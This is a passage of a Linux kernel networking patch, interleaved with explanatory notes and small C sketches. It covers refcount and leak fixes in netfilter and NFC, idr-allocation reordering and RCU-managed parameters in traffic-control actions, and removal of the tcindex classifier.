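        struct obj o = { .gen = atomic_load(&genid) };

        printf("publish: %d\n", publish(&o));
        return 0;
    }
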
+diff --git a/net/netfilter/nf_conntrack_ecache.c b/net/netfilter/nf_conntrack_ecache.c
+index 8698b34246460..69948e1d6974e 100644
+--- a/net/netfilter/nf_conntrack_ecache.c
++++ b/net/netfilter/nf_conntrack_ecache.c
+@@ -309,7 +309,7 @@ bool nf_ct_ecache_ext_add(struct nf_conn *ct, u16 ctmask, u16 expmask, gfp_t gfp
+ 			break;
+ 		return true;
+ 	case 2: /* autodetect: no event listener, don't allocate extension. */
+-		if (!READ_ONCE(net->ct.ctnetlink_has_listener))
++		if (!READ_ONCE(nf_ctnetlink_has_listener))
+ 			return true;
+ 		fallthrough;
+ 	case 1:
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 1286ae7d46096..733bb56950c14 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -2316,9 +2316,6 @@ ctnetlink_create_conntrack(struct net *net,
+ 	nfct_seqadj_ext_add(ct);
+ 	nfct_synproxy_ext_add(ct);
+ 
+-	/* we must add conntrack extensions before confirmation. */
+-	ct->status |= IPS_CONFIRMED;
+-
+ 	if (cda[CTA_STATUS]) {
+ 		err = ctnetlink_change_status(ct, cda);
+ 		if (err < 0)
+@@ -2375,12 +2372,15 @@ ctnetlink_create_conntrack(struct net *net,
+ 
+ 	err = nf_conntrack_hash_check_insert(ct);
+ 	if (err < 0)
+-		goto err2;
++		goto err3;
+ 
+ 	rcu_read_unlock();
+ 
+ 	return ct;
+ 
++err3:
++	if (ct->master)
++		nf_ct_put(ct->master);
+ err2:
+ 	rcu_read_unlock();
+ err1:
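
The new err3 label follows the usual kernel unwind idiom: error labels are stacked so that each releases exactly what was acquired since the previous one, and a late failure (here the hash insert) drops the master reference it had just taken. A generic sketch of the idiom:

    #include <stdlib.h>

    static void *acquire(void) { return malloc(16); }
    static int late_step_fails(void) { return -1; }

    static int setup(void)
    {
        void *a, *b;
        int err;

        a = acquire();
        if (!a) { err = -1; goto err1; }

        b = acquire();
        if (!b) { err = -1; goto err2; }

        err = late_step_fails();
        if (err)
            goto err3; /* newest resource is released first */

        return 0;

    err3:
        free(b);
    err2:
        free(a);
    err1:
        return err;
    }

    int main(void)
    {
        return setup() ? 1 : 0;
    }
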
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index dca5352bdf3d7..1a9d759d0a026 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5439,7 +5439,7 @@ static int nf_tables_getsetelem(struct sk_buff *skb,
+ 	int rem, err = 0;
+ 
+ 	table = nft_table_lookup(net, nla[NFTA_SET_ELEM_LIST_TABLE], family,
+-				 genmask, NETLINK_CB(skb).portid);
++				 genmask, 0);
+ 	if (IS_ERR(table)) {
+ 		NL_SET_BAD_ATTR(extack, nla[NFTA_SET_ELEM_LIST_TABLE]);
+ 		return PTR_ERR(table);
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index 6d18fb3468683..81c7737c803a6 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -29,6 +29,7 @@
+ 
+ #include <net/netlink.h>
+ #include <net/netns/generic.h>
++#include <linux/netfilter.h>
+ #include <linux/netfilter/nfnetlink.h>
+ 
+ MODULE_LICENSE("GPL");
+@@ -685,12 +686,12 @@ static void nfnetlink_bind_event(struct net *net, unsigned int group)
+ 	group_bit = (1 << group);
+ 
+ 	spin_lock(&nfnl_grp_active_lock);
+-	v = READ_ONCE(net->ct.ctnetlink_has_listener);
++	v = READ_ONCE(nf_ctnetlink_has_listener);
+ 	if ((v & group_bit) == 0) {
+ 		v |= group_bit;
+ 
+ 		/* read concurrently without nfnl_grp_active_lock held. */
+-		WRITE_ONCE(net->ct.ctnetlink_has_listener, v);
++		WRITE_ONCE(nf_ctnetlink_has_listener, v);
+ 	}
+ 
+ 	spin_unlock(&nfnl_grp_active_lock);
+@@ -744,12 +745,12 @@ static void nfnetlink_unbind(struct net *net, int group)
+ 
+ 	spin_lock(&nfnl_grp_active_lock);
+ 	if (!nfnetlink_has_listeners(net, group)) {
+-		u8 v = READ_ONCE(net->ct.ctnetlink_has_listener);
++		u8 v = READ_ONCE(nf_ctnetlink_has_listener);
+ 
+ 		v &= ~group_bit;
+ 
+ 		/* read concurrently without nfnl_grp_active_lock held. */
+-		WRITE_ONCE(net->ct.ctnetlink_has_listener, v);
++		WRITE_ONCE(nf_ctnetlink_has_listener, v);
+ 	}
+ 	spin_unlock(&nfnl_grp_active_lock);
+ #endif
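
While moving the flag from per-netns storage to a global, the bind/unbind paths keep the same discipline: writers serialize on a spinlock, readers peek locklessly via READ_ONCE(). Relaxed C11 atomics are a rough userspace stand-in for READ_ONCE/WRITE_ONCE in this sketch:

    #include <pthread.h>
    #include <stdatomic.h>
    #include <stdbool.h>

    static pthread_mutex_t grp_lock = PTHREAD_MUTEX_INITIALIZER;
    static _Atomic unsigned char has_listener; /* one bit per event group */

    static void bind_group(unsigned int group)
    {
        unsigned char bit = 1u << group;
        unsigned char v;

        pthread_mutex_lock(&grp_lock); /* writers are serialized */
        v = atomic_load_explicit(&has_listener, memory_order_relaxed);
        if (!(v & bit))
            atomic_store_explicit(&has_listener, v | bit,
                                  memory_order_relaxed);
        pthread_mutex_unlock(&grp_lock);
    }

    /* lockless reader, like READ_ONCE(nf_ctnetlink_has_listener) */
    static bool group_has_listener(unsigned int group)
    {
        return atomic_load_explicit(&has_listener,
                                    memory_order_relaxed) & (1u << group);
    }

    int main(void)
    {
        bind_group(3);
        return group_has_listener(3) ? 0 : 1;
    }
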
+diff --git a/net/netfilter/xt_length.c b/net/netfilter/xt_length.c
+index 1873da3a945ab..9fbfad13176f0 100644
+--- a/net/netfilter/xt_length.c
++++ b/net/netfilter/xt_length.c
+@@ -30,8 +30,7 @@ static bool
+ length_mt6(const struct sk_buff *skb, struct xt_action_param *par)
+ {
+ 	const struct xt_length_info *info = par->matchinfo;
+-	const u_int16_t pktlen = ntohs(ipv6_hdr(skb)->payload_len) +
+-				 sizeof(struct ipv6hdr);
++	u32 pktlen = skb->len;
+ 
+ 	return (pktlen >= info->min && pktlen <= info->max) ^ info->invert;
+ }
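
Why skb->len: the IPv6 payload_len header field is only 16 bits and reads zero for jumbograms (and for the kernel's "Big TCP" packets), so header-derived lengths break past 64 KiB. A toy illustration of the difference:

    #include <stdint.h>
    #include <stdio.h>

    struct pkt { uint32_t true_len; uint16_t hdr_payload_len; };

    /* header-derived: wrong past 64 KiB (jumbogram payload_len == 0) */
    static uint32_t len_from_header(const struct pkt *p)
    {
        return (uint32_t)p->hdr_payload_len + 40; /* + IPv6 header */
    }

    static uint32_t len_from_bookkeeping(const struct pkt *p)
    {
        return p->true_len; /* skb->len in the kernel */
    }

    int main(void)
    {
        struct pkt jumbo = { .true_len = 70000, .hdr_payload_len = 0 };

        printf("header says %u, real %u\n",
               len_from_header(&jumbo), len_from_bookkeeping(&jumbo));
        return 0;
    }
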
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 1fc339084d897..348bf561bc9fb 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1442,7 +1442,11 @@ static int nfc_se_io(struct nfc_dev *dev, u32 se_idx,
+ 	rc = dev->ops->se_io(dev, se_idx, apdu,
+ 			apdu_length, cb, cb_context);
+ 
++	device_unlock(&dev->dev);
++	return rc;
++
+ error:
++	kfree(cb_context);
+ 	device_unlock(&dev->dev);
+ 	return rc;
+ }
+diff --git a/net/sched/Kconfig b/net/sched/Kconfig
+index 4662a6ce8a7e7..bcdd6e925343f 100644
+--- a/net/sched/Kconfig
++++ b/net/sched/Kconfig
+@@ -503,17 +503,6 @@ config NET_CLS_BASIC
+ 	  To compile this code as a module, choose M here: the
+ 	  module will be called cls_basic.
+ 
+-config NET_CLS_TCINDEX
+-	tristate "Traffic-Control Index (TCINDEX)"
+-	select NET_CLS
+-	help
+-	  Say Y here if you want to be able to classify packets based on
+-	  traffic control indices. You will want this feature if you want
+-	  to implement Differentiated Services together with DSMARK.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called cls_tcindex.
+-
+ config NET_CLS_ROUTE4
+ 	tristate "Routing decision (ROUTE)"
+ 	depends on INET
+diff --git a/net/sched/Makefile b/net/sched/Makefile
+index dd14ef413fdad..b7dbac5c519f6 100644
+--- a/net/sched/Makefile
++++ b/net/sched/Makefile
+@@ -70,7 +70,6 @@ obj-$(CONFIG_NET_CLS_U32)	+= cls_u32.o
+ obj-$(CONFIG_NET_CLS_ROUTE4)	+= cls_route.o
+ obj-$(CONFIG_NET_CLS_FW)	+= cls_fw.o
+ obj-$(CONFIG_NET_CLS_RSVP)	+= cls_rsvp.o
+-obj-$(CONFIG_NET_CLS_TCINDEX)	+= cls_tcindex.o
+ obj-$(CONFIG_NET_CLS_RSVP6)	+= cls_rsvp6.o
+ obj-$(CONFIG_NET_CLS_BASIC)	+= cls_basic.o
+ obj-$(CONFIG_NET_CLS_FLOW)	+= cls_flow.o
+diff --git a/net/sched/act_mpls.c b/net/sched/act_mpls.c
+index ea5959094adb0..f24f997a7aaf9 100644
+--- a/net/sched/act_mpls.c
++++ b/net/sched/act_mpls.c
+@@ -188,40 +188,67 @@ static int tcf_mpls_init(struct net *net, struct nlattr *nla,
+ 	parm = nla_data(tb[TCA_MPLS_PARMS]);
+ 	index = parm->index;
+ 
++	err = tcf_idr_check_alloc(tn, &index, a, bind);
++	if (err < 0)
++		return err;
++	exists = err;
++	if (exists && bind)
++		return 0;
++
++	if (!exists) {
++		ret = tcf_idr_create(tn, index, est, a, &act_mpls_ops, bind,
++				     true, flags);
++		if (ret) {
++			tcf_idr_cleanup(tn, index);
++			return ret;
++		}
++
++		ret = ACT_P_CREATED;
++	} else if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
++		tcf_idr_release(*a, bind);
++		return -EEXIST;
++	}
++
+ 	/* Verify parameters against action type. */
+ 	switch (parm->m_action) {
+ 	case TCA_MPLS_ACT_POP:
+ 		if (!tb[TCA_MPLS_PROTO]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol must be set for MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (!eth_proto_is_802_3(nla_get_be16(tb[TCA_MPLS_PROTO]))) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Invalid protocol type for MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (tb[TCA_MPLS_LABEL] || tb[TCA_MPLS_TTL] || tb[TCA_MPLS_TC] ||
+ 		    tb[TCA_MPLS_BOS]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label, TTL, TC or BOS cannot be used with MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	case TCA_MPLS_ACT_DEC_TTL:
+ 		if (tb[TCA_MPLS_PROTO] || tb[TCA_MPLS_LABEL] ||
+ 		    tb[TCA_MPLS_TTL] || tb[TCA_MPLS_TC] || tb[TCA_MPLS_BOS]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label, TTL, TC, BOS or protocol cannot be used with MPLS dec_ttl");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	case TCA_MPLS_ACT_PUSH:
+ 	case TCA_MPLS_ACT_MAC_PUSH:
+ 		if (!tb[TCA_MPLS_LABEL]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label is required for MPLS push");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (tb[TCA_MPLS_PROTO] &&
+ 		    !eth_p_mpls(nla_get_be16(tb[TCA_MPLS_PROTO]))) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol must be an MPLS type for MPLS push");
+-			return -EPROTONOSUPPORT;
++			err = -EPROTONOSUPPORT;
++			goto release_idr;
+ 		}
+ 		/* Push needs a TTL - if not specified, set a default value. */
+ 		if (!tb[TCA_MPLS_TTL]) {
+@@ -236,33 +263,14 @@ static int tcf_mpls_init(struct net *net, struct nlattr *nla,
+ 	case TCA_MPLS_ACT_MODIFY:
+ 		if (tb[TCA_MPLS_PROTO]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol cannot be used with MPLS modify");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	default:
+ 		NL_SET_ERR_MSG_MOD(extack, "Unknown MPLS action");
+-		return -EINVAL;
+-	}
+-
+-	err = tcf_idr_check_alloc(tn, &index, a, bind);
+-	if (err < 0)
+-		return err;
+-	exists = err;
+-	if (exists && bind)
+-		return 0;
+-
+-	if (!exists) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_mpls_ops, bind, true, flags);
+-		if (ret) {
+-			tcf_idr_cleanup(tn, index);
+-			return ret;
+-		}
+-
+-		ret = ACT_P_CREATED;
+-	} else if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
+-		tcf_idr_release(*a, bind);
+-		return -EEXIST;
++		err = -EINVAL;
++		goto release_idr;
+ 	}
+ 
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
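
act_mpls (and act_sample below) moves tcf_idr_check_alloc() ahead of parameter validation so that every later failure funnels through one release_idr path instead of leaking the reserved action index. A sketch of the reordering, with placeholder names in place of the act API:

    #include <errno.h>
    #include <stdbool.h>

    static int reserve_index(int idx)  { (void)idx; return 0; }
    static void release_index(int idx) { (void)idx; }
    static bool attrs_valid(int attrs) { return attrs != 0; }

    static int action_init(int idx, int attrs)
    {
        int err = reserve_index(idx); /* tcf_idr_check_alloc() */

        if (err)
            return err;

        if (!attrs_valid(attrs)) { /* validation now runs after alloc */
            err = -EINVAL;
            goto release_idr;
        }
        return 0;

    release_idr:
        release_index(idx); /* single cleanup path for all failures */
        return err;
    }

    int main(void)
    {
        return action_init(1, 0) == -EINVAL ? 0 : 1;
    }
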
+diff --git a/net/sched/act_pedit.c b/net/sched/act_pedit.c
+index 94ed5857ce678..238759c3192e8 100644
+--- a/net/sched/act_pedit.c
++++ b/net/sched/act_pedit.c
+@@ -133,6 +133,17 @@ nla_failure:
+ 	return -EINVAL;
+ }
+ 
++static void tcf_pedit_cleanup_rcu(struct rcu_head *head)
++{
++	struct tcf_pedit_parms *parms =
++		container_of(head, struct tcf_pedit_parms, rcu);
++
++	kfree(parms->tcfp_keys_ex);
++	kfree(parms->tcfp_keys);
++
++	kfree(parms);
++}
++
+ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ 			  struct nlattr *est, struct tc_action **a,
+ 			  struct tcf_proto *tp, u32 flags,
+@@ -140,10 +151,9 @@ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ {
+ 	struct tc_action_net *tn = net_generic(net, act_pedit_ops.net_id);
+ 	bool bind = flags & TCA_ACT_FLAGS_BIND;
+-	struct nlattr *tb[TCA_PEDIT_MAX + 1];
+ 	struct tcf_chain *goto_ch = NULL;
+-	struct tc_pedit_key *keys = NULL;
+-	struct tcf_pedit_key_ex *keys_ex;
++	struct tcf_pedit_parms *oparms, *nparms;
++	struct nlattr *tb[TCA_PEDIT_MAX + 1];
+ 	struct tc_pedit *parm;
+ 	struct nlattr *pattr;
+ 	struct tcf_pedit *p;
+@@ -170,109 +180,125 @@ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ 	}
+ 
+ 	parm = nla_data(pattr);
+-	if (!parm->nkeys) {
+-		NL_SET_ERR_MSG_MOD(extack, "Pedit requires keys to be passed");
+-		return -EINVAL;
+-	}
+-	ksize = parm->nkeys * sizeof(struct tc_pedit_key);
+-	if (nla_len(pattr) < sizeof(*parm) + ksize) {
+-		NL_SET_ERR_MSG_ATTR(extack, pattr, "Length of TCA_PEDIT_PARMS or TCA_PEDIT_PARMS_EX pedit attribute is invalid");
+-		return -EINVAL;
+-	}
+-
+-	keys_ex = tcf_pedit_keys_ex_parse(tb[TCA_PEDIT_KEYS_EX], parm->nkeys);
+-	if (IS_ERR(keys_ex))
+-		return PTR_ERR(keys_ex);
+ 
+ 	index = parm->index;
+ 	err = tcf_idr_check_alloc(tn, &index, a, bind);
+ 	if (!err) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_pedit_ops, bind, false, flags);
++		ret = tcf_idr_create_from_flags(tn, index, est, a,
++						&act_pedit_ops, bind, flags);
+ 		if (ret) {
+ 			tcf_idr_cleanup(tn, index);
+-			goto out_free;
++			return ret;
+ 		}
+ 		ret = ACT_P_CREATED;
+ 	} else if (err > 0) {
+ 		if (bind)
+-			goto out_free;
++			return 0;
+ 		if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
+ 			ret = -EEXIST;
+ 			goto out_release;
+ 		}
+ 	} else {
+-		ret = err;
++		return err;
++	}
++
++	if (!parm->nkeys) {
++		NL_SET_ERR_MSG_MOD(extack, "Pedit requires keys to be passed");
++		ret = -EINVAL;
++		goto out_release;
++	}
++	ksize = parm->nkeys * sizeof(struct tc_pedit_key);
++	if (nla_len(pattr) < sizeof(*parm) + ksize) {
++		NL_SET_ERR_MSG_ATTR(extack, pattr, "Length of TCA_PEDIT_PARMS or TCA_PEDIT_PARMS_EX pedit attribute is invalid");
++		ret = -EINVAL;
++		goto out_release;
++	}
++
++	nparms = kzalloc(sizeof(*nparms), GFP_KERNEL);
++	if (!nparms) {
++		ret = -ENOMEM;
++		goto out_release;
++	}
++
++	nparms->tcfp_keys_ex =
++		tcf_pedit_keys_ex_parse(tb[TCA_PEDIT_KEYS_EX], parm->nkeys);
++	if (IS_ERR(nparms->tcfp_keys_ex)) {
++		ret = PTR_ERR(nparms->tcfp_keys_ex);
+ 		goto out_free;
+ 	}
+ 
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+ 	if (err < 0) {
+ 		ret = err;
+-		goto out_release;
++		goto out_free_ex;
+ 	}
+-	p = to_pedit(*a);
+-	spin_lock_bh(&p->tcf_lock);
+ 
+-	if (ret == ACT_P_CREATED ||
+-	    (p->tcfp_nkeys && p->tcfp_nkeys != parm->nkeys)) {
+-		keys = kmalloc(ksize, GFP_ATOMIC);
+-		if (!keys) {
+-			spin_unlock_bh(&p->tcf_lock);
+-			ret = -ENOMEM;
+-			goto put_chain;
+-		}
+-		kfree(p->tcfp_keys);
+-		p->tcfp_keys = keys;
+-		p->tcfp_nkeys = parm->nkeys;
++	nparms->tcfp_off_max_hint = 0;
++	nparms->tcfp_flags = parm->flags;
++	nparms->tcfp_nkeys = parm->nkeys;
++
++	nparms->tcfp_keys = kmalloc(ksize, GFP_KERNEL);
++	if (!nparms->tcfp_keys) {
++		ret = -ENOMEM;
++		goto put_chain;
+ 	}
+-	memcpy(p->tcfp_keys, parm->keys, ksize);
+-	p->tcfp_off_max_hint = 0;
+-	for (i = 0; i < p->tcfp_nkeys; ++i) {
+-		u32 cur = p->tcfp_keys[i].off;
++
++	memcpy(nparms->tcfp_keys, parm->keys, ksize);
++
++	for (i = 0; i < nparms->tcfp_nkeys; ++i) {
++		u32 cur = nparms->tcfp_keys[i].off;
+ 
+ 		/* sanitize the shift value for any later use */
+-		p->tcfp_keys[i].shift = min_t(size_t, BITS_PER_TYPE(int) - 1,
+-					      p->tcfp_keys[i].shift);
++		nparms->tcfp_keys[i].shift = min_t(size_t,
++						   BITS_PER_TYPE(int) - 1,
++						   nparms->tcfp_keys[i].shift);
+ 
+ 		/* The AT option can read a single byte, we can bound the actual
+ 		 * value with uchar max.
+ 		 */
+-		cur += (0xff & p->tcfp_keys[i].offmask) >> p->tcfp_keys[i].shift;
++		cur += (0xff & nparms->tcfp_keys[i].offmask) >> nparms->tcfp_keys[i].shift;
+ 
+ 		/* Each key touches 4 bytes starting from the computed offset */
+-		p->tcfp_off_max_hint = max(p->tcfp_off_max_hint, cur + 4);
++		nparms->tcfp_off_max_hint =
++			max(nparms->tcfp_off_max_hint, cur + 4);
+ 	}
+ 
+-	p->tcfp_flags = parm->flags;
++	p = to_pedit(*a);
++
++	spin_lock_bh(&p->tcf_lock);
+ 	goto_ch = tcf_action_set_ctrlact(*a, parm->action, goto_ch);
++	oparms = rcu_replace_pointer(p->parms, nparms, 1);
++	spin_unlock_bh(&p->tcf_lock);
+ 
+-	kfree(p->tcfp_keys_ex);
+-	p->tcfp_keys_ex = keys_ex;
++	if (oparms)
++		call_rcu(&oparms->rcu, tcf_pedit_cleanup_rcu);
+ 
+-	spin_unlock_bh(&p->tcf_lock);
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
++
+ 	return ret;
+ 
+ put_chain:
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
++out_free_ex:
++	kfree(nparms->tcfp_keys_ex);
++out_free:
++	kfree(nparms);
+ out_release:
+ 	tcf_idr_release(*a, bind);
+-out_free:
+-	kfree(keys_ex);
+ 	return ret;
+-
+ }
+ 
+ static void tcf_pedit_cleanup(struct tc_action *a)
+ {
+ 	struct tcf_pedit *p = to_pedit(a);
+-	struct tc_pedit_key *keys = p->tcfp_keys;
++	struct tcf_pedit_parms *parms;
+ 
+-	kfree(keys);
+-	kfree(p->tcfp_keys_ex);
++	parms = rcu_dereference_protected(p->parms, 1);
++
++	if (parms)
++		call_rcu(&parms->rcu, tcf_pedit_cleanup_rcu);
+ }
+ 
+ static bool offset_valid(struct sk_buff *skb, int offset)
+@@ -323,28 +349,30 @@ static int tcf_pedit_act(struct sk_buff *skb, const struct tc_action *a,
+ 			 struct tcf_result *res)
+ {
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_parms *parms;
+ 	u32 max_offset;
+ 	int i;
+ 
+-	spin_lock(&p->tcf_lock);
++	parms = rcu_dereference_bh(p->parms);
+ 
+ 	max_offset = (skb_transport_header_was_set(skb) ?
+ 		      skb_transport_offset(skb) :
+ 		      skb_network_offset(skb)) +
+-		     p->tcfp_off_max_hint;
++		     parms->tcfp_off_max_hint;
+ 	if (skb_ensure_writable(skb, min(skb->len, max_offset)))
+-		goto unlock;
++		goto done;
+ 
+ 	tcf_lastuse_update(&p->tcf_tm);
++	tcf_action_update_bstats(&p->common, skb);
+ 
+-	if (p->tcfp_nkeys > 0) {
+-		struct tc_pedit_key *tkey = p->tcfp_keys;
+-		struct tcf_pedit_key_ex *tkey_ex = p->tcfp_keys_ex;
++	if (parms->tcfp_nkeys > 0) {
++		struct tc_pedit_key *tkey = parms->tcfp_keys;
++		struct tcf_pedit_key_ex *tkey_ex = parms->tcfp_keys_ex;
+ 		enum pedit_header_type htype =
+ 			TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
+ 		enum pedit_cmd cmd = TCA_PEDIT_KEY_EX_CMD_SET;
+ 
+-		for (i = p->tcfp_nkeys; i > 0; i--, tkey++) {
++		for (i = parms->tcfp_nkeys; i > 0; i--, tkey++) {
+ 			u32 *ptr, hdata;
+ 			int offset = tkey->off;
+ 			int hoffset;
+@@ -420,11 +448,10 @@ static int tcf_pedit_act(struct sk_buff *skb, const struct tc_action *a,
+ 	}
+ 
+ bad:
++	spin_lock(&p->tcf_lock);
+ 	p->tcf_qstats.overlimits++;
+-done:
+-	bstats_update(&p->tcf_bstats, skb);
+-unlock:
+ 	spin_unlock(&p->tcf_lock);
++done:
+ 	return p->tcf_action;
+ }
+ 
+@@ -443,30 +470,33 @@ static int tcf_pedit_dump(struct sk_buff *skb, struct tc_action *a,
+ {
+ 	unsigned char *b = skb_tail_pointer(skb);
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_parms *parms;
+ 	struct tc_pedit *opt;
+ 	struct tcf_t t;
+ 	int s;
+ 
+-	s = struct_size(opt, keys, p->tcfp_nkeys);
++	spin_lock_bh(&p->tcf_lock);
++	parms = rcu_dereference_protected(p->parms, 1);
++	s = struct_size(opt, keys, parms->tcfp_nkeys);
+ 
+-	/* netlink spinlocks held above us - must use ATOMIC */
+ 	opt = kzalloc(s, GFP_ATOMIC);
+-	if (unlikely(!opt))
++	if (unlikely(!opt)) {
++		spin_unlock_bh(&p->tcf_lock);
+ 		return -ENOBUFS;
++	}
+ 
+-	spin_lock_bh(&p->tcf_lock);
+-	memcpy(opt->keys, p->tcfp_keys, flex_array_size(opt, keys, p->tcfp_nkeys));
++	memcpy(opt->keys, parms->tcfp_keys,
++	       flex_array_size(opt, keys, parms->tcfp_nkeys));
+ 	opt->index = p->tcf_index;
+-	opt->nkeys = p->tcfp_nkeys;
+-	opt->flags = p->tcfp_flags;
++	opt->nkeys = parms->tcfp_nkeys;
++	opt->flags = parms->tcfp_flags;
+ 	opt->action = p->tcf_action;
+ 	opt->refcnt = refcount_read(&p->tcf_refcnt) - ref;
+ 	opt->bindcnt = atomic_read(&p->tcf_bindcnt) - bind;
+ 
+-	if (p->tcfp_keys_ex) {
+-		if (tcf_pedit_key_ex_dump(skb,
+-					  p->tcfp_keys_ex,
+-					  p->tcfp_nkeys))
++	if (parms->tcfp_keys_ex) {
++		if (tcf_pedit_key_ex_dump(skb, parms->tcfp_keys_ex,
++					  parms->tcfp_nkeys))
+ 			goto nla_put_failure;
+ 
+ 		if (nla_put(skb, TCA_PEDIT_PARMS_EX, s, opt))
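
The pedit rework gathers all packet-editing parameters into a single RCU-managed struct: the datapath dereferences it without taking tcf_lock, and control-plane updates build a complete replacement, swap the pointer, and free the old block only after a grace period. A single-threaded sketch of that build-then-publish shape (the real code uses rcu_replace_pointer() and call_rcu()):

    #include <stdlib.h>
    #include <string.h>

    struct params { int nkeys; int keys[8]; };

    struct action { struct params *parms; /* RCU-protected in the kernel */ };

    static int update_params(struct action *a, const struct params *src)
    {
        struct params *np = malloc(sizeof(*np));
        struct params *op;

        if (!np)
            return -1;
        memcpy(np, src, sizeof(*np)); /* fully build the new blob... */
        op = a->parms;
        a->parms = np;                /* ...then publish: rcu_replace_pointer() */
        /* kernel: call_rcu(&op->rcu, tcf_pedit_cleanup_rcu) waits for
         * in-flight readers; this single-threaded sketch frees directly */
        free(op);
        return 0;
    }

    int main(void)
    {
        struct action a = { .parms = NULL };
        struct params p1 = { .nkeys = 1, .keys = { 42 } };

        if (update_params(&a, &p1))
            return 1;
        free(a.parms);
        return 0;
    }
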
+diff --git a/net/sched/act_sample.c b/net/sched/act_sample.c
+index 7a25477f5d996..09735a33e57e2 100644
+--- a/net/sched/act_sample.c
++++ b/net/sched/act_sample.c
+@@ -54,8 +54,8 @@ static int tcf_sample_init(struct net *net, struct nlattr *nla,
+ 					  sample_policy, NULL);
+ 	if (ret < 0)
+ 		return ret;
+-	if (!tb[TCA_SAMPLE_PARMS] || !tb[TCA_SAMPLE_RATE] ||
+-	    !tb[TCA_SAMPLE_PSAMPLE_GROUP])
++
++	if (!tb[TCA_SAMPLE_PARMS])
+ 		return -EINVAL;
+ 
+ 	parm = nla_data(tb[TCA_SAMPLE_PARMS]);
+@@ -79,6 +79,13 @@ static int tcf_sample_init(struct net *net, struct nlattr *nla,
+ 		tcf_idr_release(*a, bind);
+ 		return -EEXIST;
+ 	}
++
++	if (!tb[TCA_SAMPLE_RATE] || !tb[TCA_SAMPLE_PSAMPLE_GROUP]) {
++		NL_SET_ERR_MSG(extack, "sample rate and group are required");
++		err = -EINVAL;
++		goto release_idr;
++	}
++
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+ 	if (err < 0)
+ 		goto release_idr;
+diff --git a/net/sched/cls_tcindex.c b/net/sched/cls_tcindex.c
+deleted file mode 100644
+index eea8e185fcdb2..0000000000000
+--- a/net/sched/cls_tcindex.c
++++ /dev/null
+@@ -1,741 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- * net/sched/cls_tcindex.c	Packet classifier for skb->tc_index
+- *
+- * Written 1998,1999 by Werner Almesberger, EPFL ICA
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/skbuff.h>
+-#include <linux/errno.h>
+-#include <linux/slab.h>
+-#include <linux/refcount.h>
+-#include <linux/rcupdate.h>
+-#include <net/act_api.h>
+-#include <net/netlink.h>
+-#include <net/pkt_cls.h>
+-#include <net/sch_generic.h>
+-
+-/*
+- * Passing parameters to the root seems to be done more awkwardly than really
+- * necessary. At least, u32 doesn't seem to use such dirty hacks. To be
+- * verified. FIXME.
+- */
+-
+-#define PERFECT_HASH_THRESHOLD	64	/* use perfect hash if not bigger */
+-#define DEFAULT_HASH_SIZE	64	/* optimized for diffserv */
+-
+-
+-struct tcindex_data;
+-
+-struct tcindex_filter_result {
+-	struct tcf_exts		exts;
+-	struct tcf_result	res;
+-	struct tcindex_data	*p;
+-	struct rcu_work		rwork;
+-};
+-
+-struct tcindex_filter {
+-	u16 key;
+-	struct tcindex_filter_result result;
+-	struct tcindex_filter __rcu *next;
+-	struct rcu_work rwork;
+-};
+-
+-
+-struct tcindex_data {
+-	struct tcindex_filter_result *perfect; /* perfect hash; NULL if none */
+-	struct tcindex_filter __rcu **h; /* imperfect hash; */
+-	struct tcf_proto *tp;
+-	u16 mask;		/* AND key with mask */
+-	u32 shift;		/* shift ANDed key to the right */
+-	u32 hash;		/* hash table size; 0 if undefined */
+-	u32 alloc_hash;		/* allocated size */
+-	u32 fall_through;	/* 0: only classify if explicit match */
+-	refcount_t refcnt;	/* a temporary refcnt for perfect hash */
+-	struct rcu_work rwork;
+-};
+-
+-static inline int tcindex_filter_is_set(struct tcindex_filter_result *r)
+-{
